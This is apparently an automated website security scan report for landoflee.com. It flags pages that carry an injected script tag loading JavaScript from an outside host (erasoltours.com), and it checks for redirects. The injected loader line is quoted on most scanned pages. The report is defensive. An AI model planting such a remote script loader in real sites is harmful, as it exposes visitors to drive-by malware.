Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=landoflee.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://landoflee.com/ | 200 OK Content-Length: 4389 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/biopage.html | 200 OK Content-Length: 13921 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/index.html | 200 OK Content-Length: 4389 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/pixpage1.html | 200 OK Content-Length: 7354 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/pixpage2.html | 200 OK Content-Length: 7509 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- if (document.images) { butter1_w = new Image(400,600); butter1_w.src = "butter1_w.jpg"; garden1_w = new Image(400,600); garden1_w.src = "garden1_w.jpg"; rewdvlt_w = new Image(400,600); rewdvlt_w.src = "rewdvlt_w.jpg"; pea1_w = new Image(400,600); pea1_w.src = "pea1_w.jpg"; dried_grass_w = new Image(400,600); dried_grass_w.src = "dried_grass_w.jpg"; jt_rock1_w = new Image(400,600); jt_rock1_w.src = "jt_rock1_w.jpg"; orange_mushroom_w = new Image(400,600); orange_mushroom_w.src = "orange_mushroom_w.jpg"; } function hiLite(imgName,imgObjName) { if (document.images) { document.images[imgName].src = eval(imgObjName + ".src"); }} Antivirus reports:
| ||
http://landoflee.com/pixpage3.html | 200 OK Content-Length: 7675 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/pixpage4.html | 200 OK Content-Length: 7930 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/pixpage5.html | 200 OK Content-Length: 7816 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/urbanpix1.html | 200 OK Content-Length: 7643 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/urbanpix2.html | 200 OK Content-Length: 7744 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/urbanpix3.html | 200 OK Content-Length: 7832 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/urbanpix4.html | 200 OK Content-Length: 7521 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/quotepage.html | 200 OK Content-Length: 6423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/beliefpage.html | 200 OK Content-Length: 6132 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://landoflee.com/linkspage.html | 200 OK Content-Length: 6865 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: landoflee.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Jul 2014 02:48:17 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4389
Content-Type: text/html
Last-Modified: Sat, 26 Oct 2013 05:46:45 GMT
...4389 bytes of data.
GET / HTTP/1.1
Host: landoflee.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Jul 2014 02:48:17 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4389
Content-Type: text/html
Last-Modified: Sat, 26 Oct 2013 05:46:45 GMT
...4389 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: landoflee.com
Referer: http://www.google.com/search?q=landoflee.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: landoflee.com
Referer: http://www.google.com/search?q=landoflee.com
Result:
The result is similar to the first query. There are no suspicious redirects found.